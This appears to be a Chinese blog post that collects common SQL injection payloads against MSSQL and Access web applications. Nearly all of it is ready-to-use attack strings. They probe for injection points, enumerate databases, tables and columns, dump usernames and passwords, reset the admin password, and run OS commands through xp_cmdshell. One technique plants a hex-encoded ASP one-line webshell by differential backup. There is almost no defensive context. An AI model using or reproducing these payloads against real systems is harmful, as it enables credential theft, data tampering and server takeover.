`
wayne173
  • 浏览: 362451 次
  • 性别: Icon_minigender_1
  • 来自: 北京
社区版块
存档分类
最新评论

SQL注入常用语句

 
阅读更多
整形参数判断
    1、直接加'  2、and 1=1  3、 and 1=2
    如果1、3运行异常 2正常就存在注入
字符型判断
    1、直接加'  2、and '1'='1'  3、 and '1'='2'
搜索型: 关键字%' and 1=1 and '%'='%  
        关键字%' and 1=2 and '%'='%
    如果1、3运行异常 2正常就存在注入
获取数据库版本
and (select @@version)>0
获取当前数据库名
and db_name()>0
获取当前数据库用户名
and user>0
and user_name()='dbo'
猜解所有数据库名称
and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0
猜解表的字段名称
and (Select Top 1 col_name(object_id('表名'),1) from sysobjects)>0
and (select top 1 asernaose from admin where id =1)>1
.asp?id=xx having 1=1  其中admin.id就是一个表名admin 一个列名id
.asp?id=xx group by admin.id having 1=1 可以得到列名
.asp?id=xx group by admin.id,admin.username having 1=1 得到另一个列名 页面要和表有联系
如果知道了表名和字段名就可以爆出准确的值
union select 1,2,username,password,5,6,7,8,9,10,11,12 from usertable where id=6
爆账号
union select min(username),1,1,1,.. from users where username > 'a'
依次循环爆其余的账号
union select min(username),1,1,1,.. from users where username > 'admin'
;begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from userstable where username>@ret select @ret as ret into foo end
修改管理员的密码为123
.asp?id=××;update admin set password='123' where id =1
.asp?id=××;insert into admin(asd,..) values(123,..) –就能能往admin中写入123了
rebots.txt
猜解数据库中用户名表的名称
and (select count(*) from 数据库.dbo.表名)>0
若表名存在,则工作正常,否则异常
得到用户名表的名称,基本的实现方法是
1:
and (select top 1 name from 数据库.dbo.sysobjects where xtype='U' and status>0 )>0 或
and (Select Top 1 name from sysobjects where xtype=’U’ and status>0)>0
  但在异常中却可以发现表的名称。假设发现的表名是xyz,则
2:
and (select top 1 name from 数据库.dbo.sysobjects where xtype='U' and status>0 and name not in('xyz','..'..))>0
  可以得到第二个用户建立的表的名称,同理就可得到所有用建立的  表的名称
3:
and (select top l name from (select top [N]id,name from bysobjects where  xtype=char(85)) T order  by  id  desc)>1 N为数据库中地N个表
利用系统表区分数据库类型
and (select count(*) from  sysobjects)>0
and (select count(*) from msysobjects)>0
若是SQL-SERVE则第一条,ACCESS则两条都会异常
判断是否有比较高的权限
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
判断当前数据库用户名是否为db_owner:
and 1=(select is_member('db_owner'))
xp_cmdshell
:exec master..xp_cmdshell '要执行的cmd命令'
判断长度
and (select top 1 len(字段) from 表名)>5
爆料出正确值
and (select top 1 asc(substring(字段,1,1)) from 表名)>0
差异备份
//备份数据库到某处
;backup database 数据库名 to disk ='c:\\charlog.bak';--
//创建名为datachar的表
;create table [dbo].[datachar] ([cmd] [image])
  cmd为列名 image 数据类型
//插入值,为一句话木马的16进制形式:<%execute(request("a"))%>
;insert into datachar(cmd)values(0x3C25657865637574652872657175657374282261222929253E)—
//进行差异备份,把不同的信息备份到某处
;backup database 数据库名 to disk='目录' WITH DIFFERENTIAL,FORMAT;--
分享到:
评论

相关推荐

    sql注入攻击常用语句总结

    sql注入总结 语句精简 类型丰富 种类齐全 值得学习 欢迎借鉴

    SQL注入常用语句功能与技巧.rar

    SQL注入常用语句功能与技巧,每句都是经典。希望对想学注入的朋友们有用。。。。。

    SQL注入攻击常用语句(非常全,不可错过)

    ### SQL注入攻击常用语句详解 #### 一、概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL代码,利用Web应用程序对用户输入数据的处理不当,来执行非授权的数据库操作。本文将详细...

    手工SQL注入常用SQL语句

    ### 手工SQL注入常用SQL语句 #### 知识点概述 在现代网络环境中,随着业务系统的复杂度增加和技术的不断进步,安全问题日益受到重视。其中,SQL注入是一种常见的攻击方式,它通过将恶意SQL代码插入到应用程序的...

    SQL注入fuzz字典

    sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。

    DB2数据库SQL注入语句

    本文将深入探讨DB2数据库中的SQL注入语句,以及如何通过这些语句来猜解数据库结构和数据。 首先,SQL注入的基础原理是通过在合法的SQL查询语句中嵌入恶意代码,以改变原本的查询逻辑。在给定的示例中,攻击者试图猜...

    sql注入的常用命令

    ### SQL注入常用命令详解 #### 一、SQL注入概述 SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意SQL语句来控制数据库执行非授权操作。为了帮助初学者更好地理解和掌握SQL注入的基本原理及...

    sql注入讲解ppt.pptx

    七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询结果。 3. ORDER BY:使用 ORDER BY keyword 来排序查询结果。 4. LIMIT 和 OFFSET:使用 LIMIT 和 OFFSET ...

    常用Sql注入语句.

    本文将深入探讨“常用Sql注入语句”这一主题,并基于提供的资源进行详细阐述。 1. SQL注入基本原理: SQL注入是攻击者通过输入恶意的SQL代码到应用的输入字段,欺骗服务器执行非预期的数据库操作。当应用程序没有...

    sql注入常用的解决方法

    SQL注入是一种常见的网络安全威胁,它允许攻击者通过输入恶意的SQL语句来操纵数据库,获取、修改或删除敏感数据。为了防止SQL注入,开发者需要采取一系列的预防措施和解决策略。以下是一些常用的方法: 1. **参数化...

    安全测试-常见sql注入方法,命令

    安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入方法,命令安全测试-常见sql注入...

    手工注入常用SQL语句.txt

    手工SQL注入通常涉及利用已知漏洞,通过精心构造的SQL语句来探测数据库结构和数据。 ### 2. Access数据库的手工SQL注入示例 对于Access数据库,可以通过以下方式进行手工SQL注入: - `and (select id from ...

    Java防止SQL注入的几个途径

    SQL 注入攻击是黑客最常用的攻击方式之一,它可以让攻击者访问或修改数据库中的敏感信息。因此,防止 SQL 注入是 Java 开发者必须注意的安全问题。 1.杜绝 SQL 拼接 最简单的办法是杜绝 SQL 拼接。SQL 注入攻击能...

    SQL注入之如何检测与判断详细过程

    **盲注**是在SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面的一种情况。这时,我们需要通过特殊的方法来判断或尝试获取信息。以下是一些常用的盲注payload示例: - **TRUE/FALSE判断**:使用逻辑...

    SQL注入基础2.pdf

    在本材料中,主要介绍了寻找SQL注入漏洞的方法、判断注入漏洞的依据、常用测试语句和技巧,以及不同数据库类型之间的差异和如何利用这些差异进行攻击。根据不同的数据库类型(如SQL Server、MySQL、Oracle),攻击者...

    net中sql注入式攻击与防范秘籍

    SQL注入是一种常见的网络安全攻击方式,攻击者通过在数据库查询中插入恶意SQL语句,以达到非法获取数据、篡改数据甚至控制整个数据库的目的。对于使用.NET框架开发的应用程序而言,了解SQL注入的工作原理及其防范...

    基于ESAPI的防sql注入jar包及使用示例.rar

    在网络安全领域,SQL注入是一种常见的攻击手段,通过恶意构造SQL语句,攻击者可以获取、修改甚至删除数据库中的敏感数据。为了防止这种攻击,开发人员通常会采用各种防御策略,其中一种是使用安全框架如ESAPI...

    sql注入原理简介

    在Web开发中,预防SQL注入的常用方法包括使用PreparedStatement、使用存储过程、对所有输入进行验证,以及使用ORM框架等。通过这些技术手段,可以有效地阻止恶意用户通过SQL注入攻击的方式,获取敏感数据或破坏...

    防止sql注入demo

    - 使用预编译语句(PreparedStatement):这是防止SQL注入最常用的方法。预编译语句会将用户输入与SQL语句分离,确保即使输入含有恶意代码,也不会被执行。例如: ```java String query = "SELECT * FROM users ...

Global site tag (gtag.js) - Google Analytics